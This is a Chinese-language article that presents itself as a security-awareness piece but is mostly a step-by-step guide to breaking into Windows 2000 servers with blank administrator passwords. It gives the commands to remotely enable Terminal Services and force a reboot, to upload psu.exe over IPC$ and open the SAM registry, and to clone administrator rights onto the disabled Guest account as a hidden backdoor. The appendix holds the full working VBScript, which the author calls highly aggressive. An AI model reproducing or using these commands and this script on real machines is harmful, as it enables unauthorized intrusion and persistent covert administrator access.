单位：南京市广播电视大学　作者：韩治

摘　要：本文试图从一个黑客的角度来介绍入侵他人计算机的实现方法和过程，旨在提高Windows 2000等操作系统使用者的警惕，使他们了解其安全管理机制，从而注重和加强网络安全管理。

关键字：踩点、弱口令、克隆帐户（预留后面）

有很多用户都觉得Windows 2000比较好用，因此它拥有很多用户。但在此之中一些用户并不真正了解Windows 2000的安全管理机制。本文试图从一个黑客的角度对其进行简单的探讨。
    一、踩点
    踩点就是对某台计算机进行入侵前的观察。
    假设踩点结束，扫描到了一个装有Windows 2000 Server（或更高版本）计算机，并且存在弱口令，假设弱口令是：管理员帐户（Administrator），密码为空。
    弱口令并无详细规范定义，大致可以理解为容易被猜测出来的口令，如：Windows 2000至少存在一个用户是可知的，例如Administrator（管理员帐户）和Guest（默认是被系统禁用的）。所以攻击者只需要测试口令，且大部分人由于出于各种原因可能没有设置口令或者是使用简单的数字或日期作为口令，然而现在有很多软件可以在短时间内进行破译，而且破译者不需要拥有很高的学术或技巧。
    二、入侵
    在本机运行CMD，给它开个终端，命令如下：
    cscript *.vbe 192.168.0.1 administrator "" 3389 /fr
    解释：cscript *.vbe这是命令（*代表任意字符，因为此VBscript脚本程序是自己编的，可以自己任意起名字。程序见附录。），后面是有漏洞计算机的IP地址，然后是它的管理员帐户名称，接着是帐户密码，因为192.168.0.1这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口（你可以任意设置终端的端口，但默认端口是3389），/fr是重启命令（强制重启，也可以/r：普通重启，建议用强制重启命令）。
    终端服务器只在Windows 2000 Server以上的版本（包括Server）才有，PRO是不行的，此版本可以检测服务器的版本，如果是PRO，则提示你是否退出安装！
然后用Ping命令连续测试它（ping 192.168.0.1 –t），看其是否重启。等重启完成，就可以进入下一步。
    三、克隆帐户（预留后面）
    在本机运行CMD，到DOS下，建立IPC$连接。
    net use //192.168.0.1/ipc$ "" /user:"administrator"
    命令完成后，我们把psu上传到目标机的c:/Winnt/system32目录下。
    copy psu.exe //192.168.0.1/admin$/system32
    上传完毕后，开始做后门帐户。
    用连接工具连接终端，假设guest用户被禁用，我们就是要利用guest做后门帐户！
    在该服务器运行CMD，在命令行下输入：
    psu -p regedit -i PID
    这里解释一下，后面的PID是系统进程winlogon的值，我们在任务栏下点鼠标右键，看任务管理器，看进程选项卡，找到winlogon的进程，后面的数值就是winlogon的pid值，假设是1234，那么，命令就是这样psu -p regedit -i 1234。
    这样直接打开注册表，就可以读取本地sam的信息。
    打开键值HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users
    下面的就是本地的用户信息了，我们要做的是把禁用的guest克隆成管理员权限的帐户。
    HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names
    查看administrator的类型，是if4，再看guest的类型，是if5，知道类型后，打开
    HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4
    这个值，双击右侧的F，把里面所有的字符复制下来，然后打开
    HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F5
    双击右侧的F，把刚复制的粘贴到里面！
    做好了以后，把
    HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F5
    和
    HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/Guest
    这两个键值导出，导出后把那两个键值删除！然后再导入进来！关闭注册表。
    打开CMD，在命令行下输入：
    net user guest password（这条命令是给guest设置密码，后面的password就是密码）
    然后输入：
    net user guest /active:y
    这命令是激活guest帐户，然后将其禁用。
    net user guest /active:n
    （上面的三行命令必须在DOS下执行）
    打开计算机管理，看用户，guest帐户还是被禁用的。但此时它已经拥有了管理员权限！
    而且并不在管理员组里显示，还可以登陆终端，与Administrator帐户是一样的。

附录

on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="wscript.exe") then
   set objShell=wscript.createObject("wscript.shell")
   objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
   wscript.quit
end if
if wscript.arguments.count<3 then
   usage()
   wscript.echo "Not enough parameters."
   wscript.quit
end if

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
   port=wscript.arguments(3)
else
   port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
   wscript.echo "The number of port is error."
   wscript.quit
end if
if wscript.arguments.count>4 then
   reboot=wscript.arguments(4)
else
   reboot=""
end if

usage()
outstreem.write "Conneting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true

outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
   if instr(objinstoscaption.caption,"Server")>0 then
      wscript.echo "OK!"
   else
      wscript.echo "OS type is "&objinstoscaption.caption
      outstreem.write "Do you want to cancel setup?[y/n]"
      strcancel=instreem.readline
      if lcase(strcancel)<>"n" then wscript.quit
   end if
next

outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
.createkey ,"SOFTWARE/Microsoft/Windows/CurrentVersion/netcache"
.setdwordvalue HKLM,"SOFTWARE/Microsoft/Windows/CurrentVersion/netcache","Enabled",0
.createkey HKLM,"SOFTWARE/Policies/Microsoft/Windows/Installer"
.setdwordvalue HKLM,"SOFTWARE/Policies/Microsoft/Windows/Installer","EnableAdminTSRemote",1
.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Control/Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Services/TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Services/TermService","Start",2
.setstringvalue HKU,".DEFAULT/Keyboard Layout/Toggle","Hotkey","1"
.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp","PortNumber",port
end with
showerror(err.number)

rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="/r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="/fr" then flag=6
if flag<>0 then
   outstreem.write "Now, reboot target...."
   strwqlquery="select * from win32_operatingsystem where primary='true'"
   set colinstances=objswbemservices.execquery(strwqlquery)
   for each objinstance in colinstances
      objinstance.win32shutdown(flag)
   next
   showerror(err.number)
else
   wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

function showerror(errornumber)
if errornumber Then
   wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
   if err.description <> "" then
      wscript.echo "Error description: "&err.description&"."
   end if
   wscript.quit
else
   wscript.echo "OK!"
end if
end function

function usage()
wscript.echo string(80,"-")
wscript.echo "此为打开Windows 2000终端的脚本。版权属于：韩治"
wscript.echo "主页www.I94Self.com；E_mail：I94Self@Hotmail.com"
wscript.echo "用法如下："
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
wscript.echo "port: 默认是3389."
wscript.echo "/r: 普通重启"
wscript.echo "/fr: 强行重启"
wscript.echo string(80,"-")&vbcrlf
end function

注：1、此脚本程序带有及强的攻击性，请不要用于非法用途，否则后果自负。
    2、因为此程序有修改注册表的命令，所以杀毒软件可能会认为是黑客程序而提醒您。